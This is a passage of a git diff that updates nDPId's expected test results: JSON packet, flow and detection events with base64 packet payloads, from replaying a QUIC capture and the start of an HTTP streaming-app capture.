1F2WOeBaQk\/9OE5UvfkN\/r3ew5dBxJn7UeNtS6rQ6gpPlYGbk8rUIIk2X5DqTqywbIe+RRiAuXYogwHvBaICuBnHfCM4wLT
s7WZY+xJ7wiOlrjzYZvWZ9+r8Vip7nUVupQLi7sKHDfUAs9w8qngy9zGa5N55ILdyVFSStLbilI\/iUXT7Tr9z+Cx4eECmVq3sUzbveAsOaoWqQkCuLcGZ\/r3b9\/045kgK0m5LNouE+KaDM6gbEl25MY6AnLD8wZtHVXWVADD+fBzWPy+iywEnphzQirOW\/3upT7dSCactXPxZrNxFWfPymhPYu0Krc2ivZ465hUCU0ekKodOQt6rIA="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":351,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297036} -02019{"packet_event_id":1,"packet_event_name":"packet","packet_id":351,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAABQABZEalqXmHhkgrmKKgBu\/L0BOz\/LUEKQ\/69OwU7YOoEjfCU6PYIxZC0bpOhRpIoJJm+nxm46Oz7TPDsxFM7UHGJ5QaLSAhKzf2tpv2a5HzpBrqxZkSiLpkvtW4REvRhAhMuGxbt9FhZxZhIHGF10o7mZCkliyT+CXM+wsY5COnoW+BioHtzhcAIc1SFAJXC1KaM4VSZ8ASaGOMzV5qkDoWkMVkVXkOQ6Yl0LTSr13A63bczUxZ4x\/9td8rT9Hih4juaIs3wtx9OzII0pSe3pRJ8v5nPbycL23JcZMUYkOHwsu6clqBLaiq9uzdv\/UkVQvFLr6BSmz4hV8TUAuFVhlk3oYZs2jy6Lnt6JtjR5ON6UxO+amg\/oXRpYjT7\/s\/82ystuT3XOoq+c2sx+PqlbFaAug8yBeIXxzjgp2lJo8Dn7cBzcAWmBsn20IcWplQu\/4hhDQmNTcs9lGvcgAxJnM2csmvsuDDIgjoxXBsAJnRdBG4F9LcE1hvwc+6XBsAWPKCOhWZx77O45loQ1gYuo+R3lDHAKf90QLuXSeqS7ySxVsrZ+L7a1\/2Tl73hPIILFiYSrVVCHzHYbgEUR2FnZ4qJgdQANm6k7VQ0rAPZS4Ff7rLCFjiBY2VdunBzvH6VM\/NX+cTlx1jb7f7Wh6sAmS0N0688HZF+ZdGgNb1St2MKd3xCgefqsoo9gdXG2luGBB8uIrpDx8vlKjebGmswm82uvSnkBm88PHSXeyNp1Ioepnm4O68qayYBVG+iAtGK\/h2X8G6Wg+5WHs2CPDKp010y+tL4bXI\/jK\/L89DvTSjGtCgSvLSk26jjus8LpnO9B\/aHf6B01+\/SmQOwjduO6DVQTR6pMffT98puv41RE2MWaIXsUJ3OateqyC7GqFBCr9HOvE5\/NIl6bGlJXUzDzbdQLmwoz9sYVr6PF6GsR1JU2ugkt3UmReS2wXdOSS9hXah6T42MrRWMXe\/ARn13rDog1mp9T6XY8r0PSZfoQyBd2qN5kdphBGqJIpIMqN5J4YQPdQczKr5yScja69FMzXUv3N7x5BcJ8byhRJO6AE6UTdr30x\/vsJ1+Loriv8M8xjI3b2XXY6HpYOirlmqm5b69wcLMv2kF4rqgcmgYFz11w4Pqsb5ucrmsiLJ0fFoUoiv8B22nMAg3lMihc214tPUWdMLyVUp0SBD+8AedmwVe8ClnTE+67lkrkpE5ZoIiAmqghJWQAsp\/3+
zrUNinfvOtmp5KRe7g+ixZkqfSbN3\/O7\/rrF8qj03MiOryAEcKIDOVs0otnfjQQDIcHrixxFrXIPPdGeo\/XNXdT3rturTw5WbN\/T7ZNRDVoUCZkojyCHGSq+6jEEoijN1F2WOeBaQk\/9OE5UvfkN\/r3ew5dBxJn7UeNtS6rQ6gpPlYGbk8rUIIk2X5DqTqywbIe+RRiAuXYogwHvBaICuBnHfCM4wLTs7WZY+xJ7wiOlrjzYZvWZ9+r8Vip7nUVupQLi7sKHDfUAs9w8qngy9zGa5N55ILdyVFSStLbilI\/iUXT7Tr9z+Cx4eECmVq3sUzbveAsOaoWqQkCuLcGZ\/r3b9\/045kgK0m5LNouE+KaDM6gbEl25MY6AnLD8wZtHVXWVADD+fBzWPy+iywEnphzQirOW\/3upT7dSCactXPxZrNxFWfPymhPYu0Krc2ivZ465hUCU0ekKodOQt6rIA="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":352,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297036} -02019{"packet_event_id":1,"packet_event_name":"packet","packet_id":352,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgFAAABQABZEakyXmHhkgrmKKgBu\/L0BOz\/LUEKQ\/69OwU7YOoEjfCU6PYIxZC0bpOhRpIoJJm+nxm46Oz7TPDsxFM7UHGJ5QaLSAhKzf2tpv2a5HzpBrqxZkSiLpkvtW4REvRhAhMuGxbt9FhZxZhIHGF10o7mZCkliyT+CXM+wsY5COnoW+BioHtzhcAIc1SFAJXC1KaM4VSZ8ASaGOMzV5qkDoWkMVkVXkOQ6Yl0LTSr13A63bczUxZ4x\/9td8rT9Hih4juaIs3wtx9OzII0pSe3pRJ8v5nPbycL23JcZMUYkOHwsu6clqBLaiq9uzdv\/UkVQvFLr6BSmz4hV8TUAuFVhlk3oYZs2jy6Lnt6JtjR5ON6UxO+amg\/oXRpYjT7\/s\/82ystuT3XOoq+c2sx+PqlbFaAug8yBeIXxzjgp2lJo8Dn7cBzcAWmBsn20IcWplQu\/4hhDQmNTcs9lGvcgAxJnM2csmvsuDDIgjoxXBsAJnRdBG4F9LcE1hvwc+6XBsAWPKCOhWZx77O45loQ1gYuo+R3lDHAKf90QLuXSeqS7ySxVsrZ+L7a1\/2Tl73hPIILFiYSrVVCHzHYbgEUR2FnZ4qJgdQANm6k7VQ0rAPZS4Ff7rLCFjiBY2VdunBzvH6VM\/NX+cTlx1jb7f7Wh6sAmS0N0688HZF+ZdGgNb1St2MKd3xCgefqsoo9gdXG2luGBB8uIrpDx8vlKjebGmswm82uvSnkBm88PHSXeyNp1Ioepnm4O68qayYBVG+iAtGK\/h2X8G6Wg+5WHs2CPDKp010y+tL4bXI\/jK\/L89DvTSjGtCgSvLSk26jjus8LpnO9B\/aHf6B01+\/SmQOwjduO6DVQTR6pMffT98puv41RE2MWaIXsUJ3OateqyC7GqFBCr9HOvE5\/NIl6bGlJXUzDzbdQLmwoz9sYVr6PF6GsR1JU2ugkt3UmReS2wXdOSS9hXah6T42MrRWMXe\/ARn13rDog1mp9T6XY8r0PSZfoQyB
d2qN5kdphBGqJIpIMqN5J4YQPdQczKr5yScja69FMzXUv3N7x5BcJ8byhRJO6AE6UTdr30x\/vsJ1+Loriv8M8xjI3b2XXY6HpYOirlmqm5b69wcLMv2kF4rqgcmgYFz11w4Pqsb5ucrmsiLJ0fFoUoiv8B22nMAg3lMihc214tPUWdMLyVUp0SBD+8AedmwVe8ClnTE+67lkrkpE5ZoIiAmqghJWQAsp\/3+zrUNinfvOtmp5KRe7g+ixZkqfSbN3\/O7\/rrF8qj03MiOryAEcKIDOVs0otnfjQQDIcHrixxFrXIPPdGeo\/XNXdT3rturTw5WbN\/T7ZNRDVoUCZkojyCHGSq+6jEEoijN1F2WOeBaQk\/9OE5UvfkN\/r3ew5dBxJn7UeNtS6rQ6gpPlYGbk8rUIIk2X5DqTqywbIe+RRiAuXYogwHvBaICuBnHfCM4wLTs7WZY+xJ7wiOlrjzYZvWZ9+r8Vip7nUVupQLi7sKHDfUAs9w8qngy9zGa5N55ILdyVFSStLbilI\/iUXT7Tr9z+Cx4eECmVq3sUzbveAsOaoWqQkCuLcGZ\/r3b9\/045kgK0m5LNouE+KaDM6gbEl25MY6AnLD8wZtHVXWVADD+fBzWPy+iywEnphzQirOW\/3upT7dSCactXPxZrNxFWfPymhPYu0Krc2ivZ465hUCU0ekKodOQt6rIA="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297036} -02015{"packet_event_id":1,"packet_event_name":"packet","packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAACQABZEalpXmHhkgrmKKgBu\/L0BOxzEVh\/\/F+FsvgskZSJEq72gHo10TdgNOHV3qtvLr34ysT4\/BQu08NXy68awukgm428CY+3uFIa\/SsYHOQWYv\/6hMCX46sHEfK3FsGd9B4aOMTDZmbct0Hi6B5hFbC0RysqpiuCGv72ybkRYMTkkmBSpKkaxMd628mXMhcYd517jH\/CS6rxLyjH721TKnNGFMFZJpKZW05u1pmo9F74UGjuzXEO89ZOXqanGwo8ZLmQTCj85x1E1RZX9aigKv5BEr63ws6yLhHIXtPDYscZDNmE2ULVjoz3kzJuZzMzTW64HxXlwsMaX6uzVAwAX\/DVkW2gqZT9R4oqnG1iUCq0cb0MR6letAQ\/fU12ToEri5STxN\/eLewgY07DxQqjTUjGstGtGCNM\/FfDTgRtPzwTJZih3hD1CfW1YEkB9tXv3wCFGUyLRPlE7MbrU8qTOcUAn41czqUHKXgJpSWqjRlqdsmuAgafgOGhqdjw1Dm38vteZONnaZ0QujAZ7ZN3UoLVU\/0h2yR1MEUH\/ATH25T5lgD9ffI\/fHDa86FcEH0enSe06V9t2jUIcvqLGVwSzjxtjTGJjrQ5mZ9ZuX\/RsW9eLUa5XcOl6q9p1sCAM956+nfVkS7tt1A7eldJbVXEI+ZcnDnBu\/HfhQghjRReyowO0uY88d1b6J5BW747Za2CrWV3An3xcrcgJ3r7Eegcow70EpRrR+5W8ayOPOR2SGTCLovooCpYeUYQ6T838f5KeN4CcXxx
7FVrW0hCqLV+HJCGz2o\/AeBkwyRwIR35fIDm64HoUOpCMEB3l7n2WMd9lZS2DQtlFlThLuIymsnTAeZZCutQ7DJyF72B2wkJ9WAmyRaM7Nq+x0zpTQHmxR9xaamH9bBNq6ua2oCT5qfTkzoaG+IHmszzghAt5peXz7eqEaFqSW9OSi6Rt7nXeWpRnZS0xwrMxUtgUDclrW\/KBEJo0yZx1nkaOYHw9iwtzDJs2GBWmR94yQl7wvUuGIY6KjXTfn457StRyrcmSAcZVTUGxz7jG3KLfU2hiD2i+hGp67x8HUPue8RVimCp3M+CVhljP3AEXbJYiKYJq17hw\/NXXqU+vH3l4Ac+JioVTo5Q3+FwrWO7xRdRizXH89EUM4LwVRIVqhBY5DmxiNvI\/yxCgFw19mN2hP7yR4ixoyVHHevKc24iODyxhVIi2laJWFJ5DG5knu8grskOXH1flWjfxJBK\/\/3jC1BdMicLllb+efDa9SzMy\/3dPDg61ZXUXioRNvGC9lAdQLPrOxjvJhrN1U4tovGRi4vfa\/M+cLnYZdFxrakeiE5p5Ge8ewqhhgDnypGVxiKqOhWMtyl1pD7cCSKY+KDEUtztnzSKJJP5e5q2vmnfhsLtwxqp4YcMsGrDdwcy+whkFVB73zRViDcA8nfxNKx3ksom\/BzlnliiQ1AdXWXCf1pFpesZUDEc3UwYuqXdIonQnRDiCYrlhZ4tAO39+6nh8o7UbXxKCT7JVAC8TwzVqp8T9mo3m+mofsKgSIEYSKy38vRMDGMM9v4WJ+IK5iuL78dmEipzGMd1w89fuz3c5cxVfZRr1V7++wg3gzWDHZREzG0PMXkvJzh3OJ9rs93FmzU64537zWQLvOws8sCivE3d4H+qISlUIyJMOC5xzhRlbFKhIzWtB8ba5COlFqmJ\/NM="} -00575{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","packets-captured":353,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":709,"global_ts_msec":1593498297036} 
+00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593498296832,"flow_last_seen":1593498296832,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1593498296832,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +02105{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593498296832,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1260,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":1260,"pkt_l4_len":1240,"thread_ts_msec":1593498296832,"pkt":"RTgE7B0GAABAEeVBCuYoqF5h4ZLy9AG7BNgTGcP6zrABCEACR1YBz3h7AABEvkgDSkdXT8KDRtZ6SuR9aklyes\/l4Sioa5nXAcPGveAb5Mb0k7uBERsrnzBa9uno+scwKQJ+8HaE7SwNRWaJ0B+VYq5sgzaHE9BksItfZB05b19PkWz3XaOJPeabOxbegkEde\/7BgQc2iMQiMZifq3YQkFbpelKpfZ8UxZbKFKO8T8enNpDFvm79StOLsc58r6VUI7R7RX2Dh+7UvHc8w55LVS4nFdKyvt+gLMAzuTrAqSRX04ucEX43SZLKcpJ+X+iK\/v9u1yLmGT\/8hHS\/A3VBUuWVRkAqUr3zRxflhV5CjsXky9idxKWm4C9Pn6cw4624LuYteYIUWOTHQHv3zV5\/rnXQxed5aHO337llijw0yLFxpnpOUEtoxTKtZZeNyR3\/hCIkY3n14k3gHfYXZl5t7DMoJYBnIHHhmdFCOK4sdCcKtpOlPKhDiv0BdCMImPxwr5CZ3d0NvKvNFKbylEYXGyw6diXHrADpP1Bpo7IsDo6OECekYHLzamw7fo5GRjTg4wyZ585sRHNOY5UQ14urjp6qTgyJaK+bJQKQXSG\/jPsJRoA3bT9RYwhd92VXr\/SRpMsMI1dgiAabVuN6aapjwqQ05GcX1xWXUOswELHBWeda+RZSG0ealfCxTmgk\/LmTIARNNTXtxke0sf\/IlfnV3ikcr9NqDIrI6of1G3cZfUQGBWE6gBVL5hH\/8pDG4T4ZpNiYz4Y0kEK9VRD1GZ0w6BCqlt\/kg2zd6ahgaI4n0T7BllqMO01YZ1t9pyXJShYy7a1\/GE3TCKsHNgIVU+OzGaBubO2O8foCsTRqluuqUPhG3n2E8MHmbHfrbqadkpRwbm5mHSUiRHvHPOMZ3uD3xF6j764aqPOQrl01dj1iQP+qGIcEY5l4ogPeALtV3hU5f7b
pvLSDPKVoHsWvz++bxVzr7sgAnGREUzsxKt4SUYuRzz53icFmvd9rxNmgOaF+PEw\/dQIcNJqpxX8ulzLr4tUIjHsZy8Y3w0WHWlRvXX5BFt\/FNL6D1z9p+LMmNXuSPqVvh56LVqzeEf7uD4SQyYHHodFZUSZh4UJZfGLFC0eeFNy2qBWMNwCptrLdwN5PCZlQ07ewM1OmYFXib\/9zYOSk4B0N24Ml1I3V+BUt9Q\/f7In0Lo1bYVhzoFFJnm1wIhEDEaXvsKWXwZTHPIpl1Hz1I\/6Yq3hsX1N3dtM00S1An2mdoc9+06efV9TeSDkQwX8r+ZabNOKTRtHqXDe1Wl+aE\/ZahNHsuY3HnDuGINcHsBCTv1ovOmoDAi0RUdYM0lPaGHSMu61RpKW5cRQ0Cdy0+WZXfm0NBcMkEOs1K83zDl3Ni0ybs6vWiqa45kxw7H1vC362nLorQvhZdy7wTrE4RWiFGT0Xccp4Rl8QprALjpWqFcS7MPnifCUJZzLuwLuogz6ePAO7YscFlIza4b2sSjihSJrD9QLuOyhifjzSEn4amVk5ivqXVE+QZ1R7NVlYJU0wlh1SwakKVblsHRVpjkjVrp5to9V854cET1W0se7gIi2a7oXoLvW8CT8NdthxNrd\/AUaazo7KSGS96THBAG+HmraPSIMT5EEnSDc\/KXc1EWvMFe0xKOugeQC4v6tFGa5dLsgNI0TE"} +00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593498296832,"flow_last_seen":1593498296832,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1593498296832,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} +00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1593498296833,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":106,"pkt_l4_len":86,"thread_ts_msec":1593498296833,"pkt":"RQAAapbBAABAEXBACuYoqF5h4ZLy9AG7AFbkKub6zrABCEACR1YBz3h7AD4ztLOg+8\/NWUDesKp0sDyq9wl\/qnK\/iaP4qknLwsMfEkvd24lrwL0JnOo2eK80vHLhCKIp2AiTqDI94jB8\/Q=="} 
+00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1593498296833,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":106,"pkt_l4_len":86,"thread_ts_msec":1593498296833,"pkt":"RQAAapbBAABAEXBACuYoqF5h4ZLy9AG7AFbkKub6zrABCEACR1YBz3h7AD4ztLOg+8\/NWUDesKp0sDyq9wl\/qnK\/iaP4qknLwsMfEkvd24lrwL0JnOo2eK80vHLhCKIp2AiTqDI94jB8\/Q=="} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":353,"flow_first_seen":1593498296832,"flow_last_seen":1593498297036,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":390606,"flow_avg_l4_payload_len":1106,"midstream":0,"thread_ts_msec":1593498297036,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00580{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","packets-captured":353,"packets-processed":353,"total-skipped-flows":0,"total-l4-data-len":390606,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1593498297036} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ -~~ packets captured/processed: 353/0 +~~ packets captured/processed: 353/353 ~~ skipped 
flows.............: 0 -~~ total layer4 data length..: 0 bytes -~~ total detected protocols..: 0 -~~ total active/idle flows...: 0/0 +~~ total layer4 data length..: 390606 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5099937 bytes -~~ total memory freed........: 5099937 bytes -~~ total allocations/frees...: 113310/113310 +~~ total memory allocated....: 5121126 bytes +~~ total memory freed........: 5121126 bytes +~~ total allocations/frees...: 113685/113685 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ json string min len.......: 201 chars -~~ json string max len.......: 2037 chars -~~ json string avg len.......: 1119 chars +~~ json string min len.......: 486 chars +~~ json string max len.......: 2110 chars +~~ json string avg len.......: 1285 chars diff --git a/test/results/quickplay.pcap.out b/test/results/quickplay.pcap.out index cb1c49b8b..9d8bbc2f0 100644 --- a/test/results/quickplay.pcap.out +++ b/test/results/quickplay.pcap.out 
@@ -1,123 +1,123 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quickplay.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1429000030398} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00873{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1429000030398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":368,"pkt_l4_len":332,"thread_ts_msec":1429000030398,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWBDAUAAPwaoIQo2qfp4HCMpxewAUEHDiNf6xwiBUBgAc22rAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9jYXRlZ29yaWVzL0hVRD9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 
-02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1429000030498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1380,"pkt_l4_len":1344,"thread_ts_msec":1429000030498,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBVSmuUAArQbSWHgcIykKNqn6AFDF7PrHCIFBw4oPUBgIIgJuAABIVFRQLzEuMSAyMDAgT0sNClNlcnZlcjogQXBhY2hlLUNveW90ZS8xLjENCkxhc3QtTW9kaWZpZWQ6IFR1ZSwgMTQgQXByIDIwMTUgMDc6MTg6NTQgR01UDQpFVGFnOiAiWW1JNE1EQXdNREF3TURBd01EQXdNRk52YkhJPSINCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClZhcnk6IEFjY2VwdC1FbmNvZGluZw0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAqDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1IZWFkZXJzOiB4LXJlcXVlc3RlZC13aXRoDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1NZXRob2RzOiBQT1NULCBHRVQsIE9QVElPTlMsIERFTEVURQ0KWC1DbmVjdGlvbjogY2xvc2UNCkNhY2hlLUNvbnRyb2w6IHB1YmxpYywgbWF4LWFnZT0xMzg2DQpFeHBpcmVzOiBUdWUsIDE0IEFwciAyMDE1IDA4OjUwOjE2IEdNVA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbjtjaGFyc2V0PVVURi04DQpDb250ZW50LUxlbmd0aDogNzg1DQoNCh+LCAAAAAAAAADkV89v0zAYve+vsHrgNFDbgUDcyrpuYoyhtfSCOHxNvqZmjh35x0ap+r9jp2mXNIlbzRwQXCr1+17ynv3s+Hl1QgjpLBBilJ33ZOX+uorSoI2ylY4yUYRKdU63rQwS\/GzSWf5Ar1Ie019oi2+6u6oWGtgFwxS5dq87q3a+2Idcueeq67zXSYHyO1TCyAjLkmS95so0diqvvg53CsvgyTJzD3Qi0JgIuayAmIiA5W3kSaUDWssJJK4VowbKVKXNIcUm1hhVJGmmqeB528TkvIn4HpePQsZu5N+eyq7j3vhU+V5+CDnMGA6lyIbikd8gz\/3R0mBVwhwM07dyY2j3Vbf+jkvkEkeU6RwyB6awDvoEPDHWHg\/up0YeYzywk0VnRudOrtYFYr1zeg4R5uaXbUuchtr4V5V\/xVS5qRxEblIH8YNdR8Y+eFoDbj3ZIMkL4gNHwnBt0f1KZ316pBhOU8hN9sjwYMLYz0WK8dJD3QoI4x2KyLhtDNJH7kcFKpCQgo+7pR\/GemnfPl6IR+VhdhjSBgqjvxJSCunhbgWE8V7TWI0gpczntgPZrdaKC5NwA1JTYAOp1TgT9tejpMASB7aKWvFhiu4QGNXLydSjpMCQRlAgvUiBR76vXzsijHkc0REdgd3XyrceLOzliJJ2YJiKyUJSxtC3GzyQMO4pSIp6ecHtaWgTAXcfOY+OAk4O4beielVRLRmAFYfy8QfnXrLZU3nBE0bVwqOr+6zJSmTPw\/pBMGYDkIj\/OO+PzHcmf4QMOCrf7ngerU6Yb0lCAkw02RDGeu89Fq
